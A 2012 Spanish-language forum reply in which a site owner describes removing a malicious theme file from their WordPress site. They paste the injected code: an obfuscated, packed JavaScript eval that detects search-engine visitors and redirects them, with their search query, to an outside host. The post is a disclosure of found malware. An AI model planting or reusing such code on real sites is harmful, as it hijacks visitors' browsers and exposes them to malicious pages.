Ver Mensaje Individual
  #5 (permalink)  
Antiguo 26/01/2012, 15:28
jafp_pe
 
Fecha de Ingreso: noviembre-2008
Mensajes: 371
Antigüedad: 15 años, 5 meses
Puntos: 3
Respuesta: Error en firefox, con clase de contenido

Cita:
Iniciado por Daniel Ulczyk Ver Mensaje
Mi participación, no contesta a tu pregunta, pero tiene que ver con la seguridad de tu sitio. Al consultar la URL mi escudo Web detecta una anomalía:



Espero lo puedas solucionar.
Amigo quite este archivo; postalesxd.com/wp-content/themes/gPlusTheme/script.js no se si era eso pero creo que ahora si puedes acceder al sitio, te sigue saliendo virus a quien le sale virus? a mi no... pero a mi novia si le salia en su pc con el mismo antivirus AVAST, por favor chekeen.

Creo que solucione el problema, este era el virus:

Código:
<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script
Ahora si ayuden con el css!! MIL GRACIAS!!
__________________
Las Mujeres mas hermosas = Mujeres Fatales
Mi blog Personal = JAFP

Última edición por jafp_pe; 26/01/2012 a las 16:15